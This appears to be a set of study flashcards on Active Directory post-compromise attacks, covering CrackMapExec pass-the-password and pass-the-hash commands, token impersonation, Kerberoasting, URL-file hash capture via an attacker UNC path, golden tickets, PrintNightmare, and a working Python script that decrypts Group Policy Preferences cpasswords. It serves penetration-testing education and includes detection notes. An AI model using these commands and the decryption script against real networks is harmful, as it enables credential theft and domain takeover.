Active Directory: Post-Compromise Attacks Flashcards

1
Q

What is CrackMapExec?

A

It’s a post-compromise tool for penetration testing of Windows and Active Directory networks (its maintained successor is NetExec, nxc, which keeps the same syntax). Given one set of credentials it authenticates to many hosts at once over SMB and other protocols, enumerates shares, sessions and users, runs commands and dumps secrets, which is how it is used to find and carry out lateral movement.

2
Q

What is a Pass the Password Attack?

A

It’s an attack in which the attacker reuses a password already obtained (from a cracked hash, a configuration file, a Responder capture) to authenticate to other machines. With CME you can try the credentials against every host in a range and see which ones accept them, and on which of those the account is a local administrator.

3
Q

What command can be used to perform a Pass the Password attack? What should you look for in the output?

A
$ crackmapexec smb network_ip/CIDR -u username -d domain.name -p password

Every host that answers on SMB gets one line. A green “[+]” means the credentials authenticated to that host; a line that additionally ends in “(Pwn3d!)” means the account is a local administrator there, which is what psexec.py and secretsdump.py need. A “[-]” line is a failed logon. One known-good password for one user does not risk lockouts; spraying many passwords per user does, so read the domain lockout policy first.

4
Q

The Pwn3d machines (Pass the password attack)

What tool can be used to get a shell?

A

psexec.py (from Impacket). It uploads a service binary over an admin share and starts it as a service, so it only works on the hosts marked (Pwn3d!) and gives a SYSTEM shell; it is noisy, because the service creation is logged on the target.

5
Q

The Pwn3d machines (Pass the password attack)

What tool can be used to dump SAM hashes?

A

secretsdump.py (from Impacket). Against a workstation or member server it dumps the local SAM (local account NT hashes), the LSA secrets and cached domain credentials; against a domain controller it can dump every domain account hash, krbtgt included, through DRSUAPI replication (the DCSync technique).

6
Q

What is a Pass the Hash attack?

A

It’s an attack in which the attacker authenticates with a captured NT hash instead of the plaintext password, which works because NTLM authentication only ever needs the hash. It is used for lateral movement, typically after dumping the local SAM on one host and finding that the same local administrator hash is accepted by others.

7
Q

What command can be used to perform a Pass the Hash attack? What should you look in the output?

A
$ crackmapexec smb network_ip/CIDR -u username -H hash --local-auth

-H takes the NT hash (LM:NT also works) in place of -p. --local-auth authenticates against each host’s local SAM, the usual case after a secretsdump, since the same local administrator hash is often reused across machines; for a domain account’s hash drop --local-auth and give -d domain.name instead. As with pass the password, the green “[+]” means the hash was accepted and “(Pwn3d!)” means the account is a local administrator on that host.

8
Q

What are the two types of access tokens?

A
  • Delegation tokens: created when a user logs on interactively with their credentials, for example at the console or over RDP. They can be used to authenticate to other systems on the network on that user’s behalf.
  • Impersonation tokens: created by non-interactive logons, for example a user mounting a network share or running a logon script, so the user is not prompted for credentials; they are only valid for actions on the local machine. Usually this type of token is created after a delegation token already exists and reuses the credentials established by that earlier interactive logon.
9
Q

What is Token Impersonation?

A

It’s a Windows post-compromise technique in which an attacker who already controls a machine takes over the access token of another logged-on user (with Metasploit’s incognito module, for example) and impersonates that user without knowing their credentials, performing actions with their level of privilege.

10
Q

What can be achieved with token impersonation?

A

This technique is effective for privilege escalation and lateral movement: if a logged-on user is a domain admin, the attacker obtains domain admin privileges by impersonating them, and a stolen delegation token can be used to pivot to other domain machines in the network.

11
Q

What is the requirement to perform a token impersonation?

A

The attacker must already have local administrator (or SYSTEM) privileges on the target machine; with those, they can list and steal the tokens of every other user logged on to it.

12
Q

For how long is an access token available on a machine?

A

Until the machine is rebooted. Tokens survive the user logging off, so a domain administrator who logged on once to a machine that has not been rebooted since leaves an impersonable token behind.

13
Q

What is Kerberoasting?

A

It’s a post-exploitation technique in which any authenticated domain user abuses the Kerberos protocol to request a service ticket (TGS) for a service account and crack it offline. The cracking happens entirely on the attacker’s machine, so it causes no failed logons and therefore no account lockouts.
The steps are:
1. The attacker authenticates to the KDC with any valid domain credentials (a password or its NTLM hash) and receives a TGT;
2. Presents the TGT and requests a service ticket for a service principal name (SPN) that is registered on a user account, such as a SQL or IIS service account;
3. Receives the service ticket, which is encrypted with the service account’s long-term key (for the RC4-HMAC encryption type that key is the account’s NT hash, which is why tools request RC4 where the domain still allows it);
4. Cracks the ticket offline with hashcat (mode 13100 for $krb5tgs$23$ lines) or John the Ripper; the recovered password belongs to the service account, which is often old, never rotated and over-privileged.

Important: these requests (for the TGT and the TGS) are all made to a domain controller, which logs every service ticket request as event 4769; a burst of 4769 events with ticket encryption type 0x17 (RC4) from one user is the classic detection.

14
Q

Kerberoasting

What tool can be used to grab a TGS?

A

GetUserSPNs.py (from Impacket). It lists the user accounts that have an SPN and, with -request, asks the domain controller for a service ticket for each one and prints it in hashcat/John format. On Windows the equivalents are Rubeus (kerberoast) and PowerSploit’s Invoke-Kerberoast.

15
Q

What is GPP and how it can be attacked?

A

Group Policy Preferences (GPP) is a feature that gives administrators extra ways to configure machines in a Windows domain: creating local accounts, mapping drives, scheduling tasks, installing services and so on, several of which can embed a password (a common use was setting one local administrator password on every workstation).
For confidentiality these embedded passwords are encrypted with AES-256 and stored as the cpassword attribute in an XML file in the policy folder on the SYSVOL share (Groups.xml for local accounts; Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml can also carry one). The main problem is that the AES key is the same in every domain and Microsoft published it in the MSDN documentation, so any domain user, who can read SYSVOL by design, can find a cpassword and decrypt it with gpp-decrypt or PowerSploit’s Get-GPPPassword. MS14-025 (2014) stopped the policy editor from creating new cpassword entries but did not remove existing ones, so old policy files are still found in the wild.
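Added example, not part of the original flashcards and not gpp-decrypt’s or PowerSploit’s code: a standard-library Python script that pulls every cpassword out of a preferences XML file and decrypts it with the published key. The Groups.xml below is a constructed sample in the layout found under SYSVOL\<domain>\Policies\{GUID}\Machine\Preferences\Groups\, with the widely published test cpassword; the AES-256 key is the MSDN one. AES is implemented inline so the script runs without pycryptodome; it is a teaching implementation, not a constant-time one.

```python
import base64
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published on MSDN; identical in every domain, which is the whole problem.
GPP_AES_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")


def _make_sbox():
    """Generate the Rijndael S-box (GF(2^8) inverse followed by the affine map)."""
    sbox, p, q = [0] * 256, 1, 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF      # p *= 3
        q ^= q << 1; q ^= q << 2; q ^= q << 4; q &= 0xFF           # q /= 3
        if q & 0x80:
            q ^= 0x09
        x = q ^ (q << 1) ^ (q << 2) ^ (q << 3) ^ (q << 4)           # affine transform
        sbox[p] = (x ^ (x >> 8) ^ 0x63) & 0xFF
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox

SBOX = _make_sbox()
INV_SBOX = [SBOX.index(i) for i in range(256)]
INV_MIX = (14, 11, 13, 9)

def _gmul(a, b):
    """Multiply in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = ((a << 1) ^ 0x1B) & 0xFF if a & 0x80 else a << 1
        b >>= 1
    return r

def _expand_key(key):
    """AES-256 key schedule: 15 round keys, each 16 bytes in column-major order."""
    w = [key[i:i + 4] for i in range(0, 32, 4)]
    rcon = 1
    for i in range(8, 60):
        t = bytearray(w[i - 1])
        if i % 8 == 0:
            t = bytearray(SBOX[b] for b in t[1:] + t[:1])   # SubWord(RotWord())
            t[0] ^= rcon
            rcon = _gmul(rcon, 2)
        elif i % 8 == 4:
            t = bytearray(SBOX[b] for b in t)
        w.append(bytes(x ^ y for x, y in zip(w[i - 8], t)))
    return [b"".join(w[4 * r:4 * r + 4]) for r in range(15)]

def _decrypt_block(rk, block):
    """AES-256 inverse cipher on one 16-byte block (state index = 4*col + row)."""
    s = bytes(a ^ b for a, b in zip(block, rk[14]))
    for rnd in range(13, -1, -1):
        s = bytes(s[4 * ((c - r) % 4) + r] for c in range(4) for r in range(4))  # InvShiftRows
        s = bytes(a ^ b for a, b in zip((INV_SBOX[x] for x in s), rk[rnd]))      # InvSubBytes + AddRoundKey
        if rnd:                                                                   # InvMixColumns
            s = bytes(_gmul(s[4 * c], INV_MIX[-r % 4]) ^ _gmul(s[4 * c + 1], INV_MIX[(1 - r) % 4])
                      ^ _gmul(s[4 * c + 2], INV_MIX[(2 - r) % 4]) ^ _gmul(s[4 * c + 3], INV_MIX[(3 - r) % 4])
                      for c in range(4) for r in range(4))
    return s

def aes256_cbc_decrypt(key, iv, ct):
    rk, prev, out = _expand_key(key), iv, bytearray()
    for i in range(0, len(ct), 16):
        out += bytes(a ^ b for a, b in zip(_decrypt_block(rk, ct[i:i + 16]), prev))
        prev = ct[i:i + 16]
    return bytes(out)

def decrypt_cpassword(cpassword):
    """cpassword is base64 with '=' padding stripped; plaintext is PKCS#7-padded UTF-16LE, IV is all zero."""
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    pt = aes256_cbc_decrypt(GPP_AES_KEY, bytes(16), raw)
    return pt[:-pt[-1]].decode("utf-16-le")

# Constructed Groups.xml in the layout found in a policy's Machine/Preferences/Groups folder on SYSVOL.
GROUPS_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LocalAdmin" image="2"
        changed="2015-02-18 01:53:01" uid="{D5FE7352-81E1-42A2-B7DA-118402BE4C33}">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
        changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
</Groups>"""

def extract_gpp_credentials(xml_text):
    """Return (account, plaintext) pairs for every cpassword in a preferences XML file."""
    found = []
    for props in ET.fromstring(xml_text).iter("Properties"):
        cp = props.get("cpassword")
        if cp:
            found.append((props.get("userName") or props.get("newName"), decrypt_cpassword(cp)))
    return found

if __name__ == "__main__":
    for account, password in extract_gpp_credentials(GROUPS_XML):
        print(f"{account}: {password}")   # LocalAdmin: Local*P4ssword!
```

The same extraction loop works for the other preference files, because all of them put cpassword on a Properties element; only the attribute naming the account differs (userName in Groups.xml, accountName in Services.xml and ScheduledTasks.xml, for example). Once decrypted, the password goes straight into the pass-the-password sweep above.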

16
Q

What is a URL file attack?

A

This technique consists in finding a file share the attacker can write to and dropping a .url (Internet shortcut) file there whose IconFile entry points to a UNC path on the attacker’s machine, such as \\attacker_ip\share\icon.ico. When any user merely browses to that folder, Explorer tries to load the icon over SMB and authenticates to the attacker’s host, where Responder is listening and captures the user’s NetNTLMv2 challenge-response. “Hash” is loose here: a NetNTLMv2 response cannot be passed like an NT hash; it has to be cracked offline (hashcat mode 5600) or relayed with ntlmrelayx while it is fresh. Naming the file with a leading “@” makes it sort first in the listing, so it is rendered, and triggers, as soon as the folder opens.

17
Q

What can you do after getting access to the krbtgt account’s hash?

A

Forge Kerberos tickets yourself. With the krbtgt account’s NT hash (dumped from a domain controller with secretsdump.py) you can create golden tickets: forged TGTs for any user, including a made-up domain administrator, that the KDC accepts because they are encrypted with its own key. With a service account’s hash the same forgery yields a silver ticket, valid only for that service on that host. A golden ticket lets you request service tickets for any machine in the domain, so it amounts to owning the domain, and it stays valid until the krbtgt password has been changed twice.

18
Q

What is the Print Nightmare vulnerability?

A

It’s a RCE vulnerability that abuses the Windows print Spooler, specifically the RpcAddPrinterDriverEx() function. This function is used to install printer drivers remotely and any authenticated user have the ability to install any print driver to windows. This can be used to escalate privileges to a domain admin level. We have to create a malicious dll with a reverse shell in it and host it using SMB server, then we will run the exploit.